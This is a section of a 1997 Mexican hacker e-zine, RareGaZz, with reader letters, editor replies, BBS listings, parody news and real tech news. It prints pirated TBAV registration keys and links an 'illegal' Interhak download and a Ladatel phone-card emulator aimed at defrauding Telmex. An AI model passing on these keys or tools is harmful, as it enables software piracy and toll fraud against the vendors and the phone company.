\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-


 SE PASARON CON INTERHAK!!! QUIEN LO HIZO? COMO LO HIZO? PERMITIRA ENTRAR
 A INTERNET EN OTRAS CIUDADES?

 [ Me suenas a NARC! Quieres saber mucho sobre un programa ilegal y eso no
   es bueno chamaco. Si ustedes no tienen su copia de Interhak podran bajarla
   en los proximos 5 dias despues de que haya salido esta revista unicamente
   en el siguiente link: http://www.geocities.com/Baja/4426/interhak.zip
   Si ya no lo encuentras, entonces es demasiado tarde :-) ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

              Razon numero uno para temer a la tecnologia:

        o      o     o    o    o    o>   o     o    o    o    o    o    o
       ^|\    ^|^   v|^  ^|^  |/v   \    x    </   <|>  <|>  v|v  |/v  x|x
        /\     >\   /<    >\  /<   /<    >\   /<    >\  /<    >\  /<    >\

        <o    <o>   o    o   o    o    o
         \|    |   <|>  </> <\>  <)>   |\   Mr. ASCII baila Macarena :-)
        /<     >\   >\  /<   >\   >>   L    

 [ Se autoriza el posteado de este arte ASCII en cualquier BBS mencionando
   que se obtuvo de esta revista ok? killerbot                             ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

P1 : De donde puedo conseguir versiones actualizadas de Linux
    (Gratis)??????

 Monra

 [ En el siguiente link www.redhat.com parece estar disponible la version
   mas nueva 4.02. Linux es un gran sistema para PC pero es muy dificil
   configurarlo correctamente. Estos lugares pueden ayudar a eso:
   http://www.xinside.com
   http://sunsite.unc.edu/pub/Linux
   http://www.singnet.com.sg/~sunsurf
   http://www.caldera.com/linux_info.html

   PARA LOS MAQUEROS AQUI TIENEN EL LINK PARA BAJAR LINUX!!
   http://www.mklinux.apple.com                                           ]


\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

 Nombre               Horario        telefono          
 Dark Comm aXs        21-08hrs       583-6655 
 Death Star           22-07hrs       567-5242 
 Laberinto            24.hrs.        5500891

 Son BBS del Distrito Federal que ESTAN EN LINEA en estos momentos. raretrip

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

 Algunos de ustedes tiene TBAV para Windows 95 o Dos y desean registrarlo?
 Entonces diriganse hacia donde aparezca Help, About y eligan Register.
 Las claves son las siguientes para Tbav Windows 95

 Nombre: raregazz
 Clave1: 14a3e02a
 Clave2: 6f234484
 Clave3: 819feb9f
 Clave4: acc2f4b5
 Clave5: 66ffffc2

 Nombre: raredude
 Clave1: 0998EF3F
 Clave2: 99999999
 Clave3: 99999999
 Clave4: 99999999
 Clave5: 4C99FF58

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

APENAS ENCONTRE SU REVISTA, YO SOY REALMENTE NUEVO EN LA INTERNET(COMO 6
MESES), PERO E VAGADO Y DESDE QUE ENCONTRE LOS GRUPOS DE HACKERS ME HE
METIDO MUCHO EN EL TEMA. SU REVOISTA ES LA MEJOR QUE HE LEIDO(Y ESO QUE
E LEIDO CASI TODAS), INCLUSO SON MUY SUPERIORES A LAS ESPAOLAS. Y
AUNQUE MI TIRADA ES MAS POR LA MAMADA DE LOS VIRUS, CREO QUE SU REVISTA
ES LA MAS COMPLETA, POR CIERTO EN UN NUMERO SALE LA DESCRIPCION DEL
VIRUS "Zhengxl", Y E ESTADO BUSCANDO EL CODIGO EN ENSAMBALDOR DE ESTE
VIRUS(A MI ME ENCANTA ANALISAR LOS CODIGOS EN ENSABLADOR), ASI QUE SI
SABEN DONDE LO PUEDO CONSEGUIR SE LES AGRADESERIA QUE ME LO HICIERAN
SABER. A POR CIERTO EN UNA DE SUS REVISTAS PIDEN ALGO PARA CHINGARSE A
TELMEX, PUES AQUI LES VA:
       http://www.si-mexweb.com/mex-hack/spanish/tprom.zip
LA DIRECCION COMO VEN ES DE GILIGAN EL DE MEX-HACK, ESTA ES UNA TARJETA
PROM PARA SIMULAR UNA TARJETA LADATEL, SEGUN GILIGAN ESTA MADRE SI
FUNCIONA PERO NO LA HE PODIDO PROVAR YA QUE ME FALTA LA MEMORIA RAM QUE
NO HE PODIDO ENCONTRAR, PERO EN SI EL DOCUEMTO ESTA MUY INTERESANTE PARA
QUE LO ADICIONEN EN ALGUN NUMERO DE SU REVISTA.
	POR OTRO NO CONOCEN HA NADIE DE POR ACA La tierra del tequila y el
mariachi (Gudalajara), QUE SE DEDIQUE AL HACKING, CRACKIN O A LOS VIRUS,
PARA FORMAR ALIANSAS POR ACA. 
YA PARA CABAR, SIGAN COMO VAN Y NO VAYAN A DESAPARECER DE LA RED COMO
LES PASA A LOS HACKERS ESPAOLES, CHIDO RAZA Y SIGAN DANDO...

La informacion es conocimiento
y el saber nos hace libres.
				
				ATTTEEENNTTAMMENTTE
							VoV_77

P.D. Aqui les va algo que me encontre por la red.

Cliente:         "Estoy corriendo Windows 95..."
Soporte Tecnico: "Si."
Cliente:         "Mi computadora no esta funcionando."
Soporte Tecnico: "Si, eso ya me lo habia dicho."

[ El codigo del virus Zhengxi nosotros tambien lo hemos buscado sin suerte,
  de hecho ni siquiera hemos podido encontrar el codigo compilado :-( Sabemos
  que existe por las multiples reseas que hay en internet sobre el virus
  pero por el momento el codigo no ha podido ser desensamblado. Sobre hackers
  en Guadalajara conocemos algunos, si alguien quiere iniciar algo con VoV_77
  por esos lares comuniquense con nosotros y se lo haremos saber. ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

 [ Quisiera aclarar a todos los lectores que nos tratan de ayudar mandando
   textos (en ingles) que la mayoria ya los tenemos. No se cual sea su
   impresion de este e-zine pero nosotros NO somos simples traductores!
   Ustedes pueden ayudar mas si en lugar de mandarnos textos en ingles para
   que los incluyeramos en el mag, HICIERAN sus propios textos en espaol
   sobre lo que ustedes saben. Eso nos haria sentir mucho mejor que recibir
   textos en ingles una y otra vez de distintas personas.  Que sucede ?
   ven a raregazz como una simple maquina traductora? Cada vez que hacen eso
   nos desilusiona el pasar literalmente horas creando los textos para esta
   revista. Explicar algo que ustedes sepan para una revista electronica
   resulta demasiado facil y los alentamos a que lo hagan. Recuerden que no
   todos saben lo mismo sobre i-net y otros programas como Mirc. No lo tomen
   a mal, sepan sacar lo constructivo de este mensaje :-) KB                ]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

                                 > NotiLOONS <
                                   ~~~~~~~~~
                         "Noticias para el Interesado"

El nuevo Keyboard de Microsoft

Microsoft Corporation ha anunciado un nuevo Keyboard diseado especialmente
para Windows. Aparte de las teclas encontradas en el standard keyboard, el
nuevo diseo de microsoft incluye varias nuevas teclas que haran tu
experiencia en la Pc mas divertida. Las teclas propuestas son:

1) GPF key-- Esta tecla generara inmediatamente un "General Protection Fault"
   cuando sea presionada. Los representantes de microsoft han explicado que
   el proposito de esa tecla es el eliminar la fastidiosa tarea de tener que
   ejecutar un programa para producir un General Protection Fault.

2) $$ key-- Cuando esta tecla sea presionada, el dinero de tu cuenta bancaria
   sera automaticamente depositado en la cuenta de microsoft sin la necesidad
   de alguna otra accion o intervencion de terceras personas.

3) MS key-- Esta tecla ejecuta un comercial titulado "Computing for Mindless
   Drones" en una ventana 1" x 1"

4) Chicago key-- Genera ninguna otra cosa que simples loops por meses...

5) IBM key-- Busca en tu disco sistemas operativos o aplicaciones realizadas
   por otras compaias que no sean microsoft y las elimina.

-|-|--|-|-|-|-|-|-|-|-|-|-|-|-|-|-|--|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|

   MATTEL ANUNCIA lo mas nuevo en su nueva linea de productos Barbie, la
   llamada "Hacker Barbie." Estas nuevas muecas seran sacadas a la venta
   proximamente. La compaia intenta desterrar los antiguos mitos sobre la
   mujer como que no saben nada de computadoras, tienen fobia a los numeros y
   que tienen incapacidades academicas.

   Esta nueva linea de muecas Barbie viene equipada con su propia terminal
   y documentacion UNIX asi como toda la serie arco-iris. El vestuario de la
   Barbie consiste en una camisa de botones sucia y un par de jeans bastante
   usados. Los accesorios incluyen un reloj CASIO y lentes tan gruesos que
   podrian hacer fuego en las hormigas.
   (Protectores de bolsillo y calculadoras HP opcionales.)

   La nueva Barbie tiene la increible capacidad de pasarse en la pantalla
   sin parpadear, comer o beber 16 horas seguidas. Su vocabulario consiste
   principalmente en "Cual es tu direccion Internet", "Me gusta TCP/IP!",
   "Tu Kernel esta daado" y "Viva el CyberSex!".

   "Estamos muy emocionados con este producto," dice Ken Olsen, Ejecutivo
   de ventas. La compaia designo como su compaero KEN a un consultante
   ejecutivo que frecuentemente pide ayuda tecnica a Barbie.

   Los grupos feministas estan igualmente excitadas por esta nueva linea
   de muecas.

   Los padres -por otra parte- estan preocupados en que caeran detras de los
   nios cuando la mueca salga al mercado. "My hija Jenny juega con su
   mueca todo el tiempo y dos dias fueron suficientes para que empezara a
   pagar mis deudas de credito bancarias" Dice Carlson de Oxford, Mississipi
   "No se como lo hace  pero ciertamente lo hace. Lo unico que no quiero es
   ser vista por mi hija como una madre tonta". Mattel ofrecera cursos de
   entrenamiento gratuitos a los padres que compren la nueva Hacker Barbie.

   La futura linea de Hacker Barbie incluira bastantes variaciones para
   llenar los distintos aspectos de la cultura hacker. "Hacker Barbie va a
   la Carcel" enseara las eticas computacionales a los nios, mientras
   "B4RB13 32CR1B3 421" servira como una introduccion al tipo de escritura.

                [ Articulo sobre "Hacker Barbie" de Phantasy Mag ]

\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-
                              ** !NOTICIAS SERIAS! **
\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-\\-//-

Dragon Systems, un lider en el terreno de software para la recognicion de voz
a sacado a la venta su nuevo programa ($299) para reconocer voz continua, con
esta tecnologia uno podra hablarle a la computadora sin...tener...que...hacer
...pausas.

Jueces federales de EUA han mantenido derrotadas las propuestas contra
Internet como la ley de decencia de Nueva York que fue tachada de
anti-constitucional y otra ley de Georgia que proponia prohibir la navegacion
anonima por la red ha sido tambien derrotada.

American Online sufrio el viernes 20 de junio un ataque masivo de email
afectando a 500,000....Los hackers explotaron un BUG en el programa de
Microsoft "Microsoft Information Server". Un FIX esta disponible.

En la primera decision sobre Internet, la suprema corte de justicia a
declarado al "Communication Decency Act" como anti-constitucional.

2/julio/1997 - Si has tenido problemas cuando te diriges al website de
www.microsoft.com en esta semana, es debido al ataque que esta siendo sometido
este sitio por hackers desconocidos hasta la fecha que han estado negando con
exito el acceso a ese servidor. Este ataque resulta penoso ya que antier
Microsoft anuncio sus nuevos productos "firewall" (barreras de fuego).

El servidor de email anonimo HUGE.CAJONES.COM esta fuera de servicio!! Lo que
significa que el programa para enviar email anonimo de Raretrip REMAIL.ZIP
no sirve por el momento :-( Envia un mensaje a remailer@huge.cajones.com con
el subject remailer-help para saber si esta en linea.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

           ooo
          $   $        oo   Participa en esta revista y forma parte de la
          "   oo      "  $  gran familia de amigos de raregazz.
           $   $     $   "
           "o  "o   o"  $   Todos aquellos que hayan incluido un link a
            $o  $   "   "   nuestra pagina usando alguno de nuestros logos
            "$   $ $   $    hagan el favor de enviarnos un logo de su pagina
             $$  $o    "    de tamao maximo 70x70 y maximo 5k. Esto es
          ooo $ooo o  $     para que su link en nuestra pagina se distinga
         $  "$$o    $ $     de los demas.
       o""o  "$ ""o  $$
       $  $   "$  $   $
       $o  $o  $  "    $    Hasta luego y les prometemos que el siguiente
       $"o $"""       o"    numero traera aun mejores participaciones y mas
        $ ""          $     consejos y utilidades. raretrip
        "            $
         "o         $
          $         $
           """"""""
       <<::RareGaZz::>>
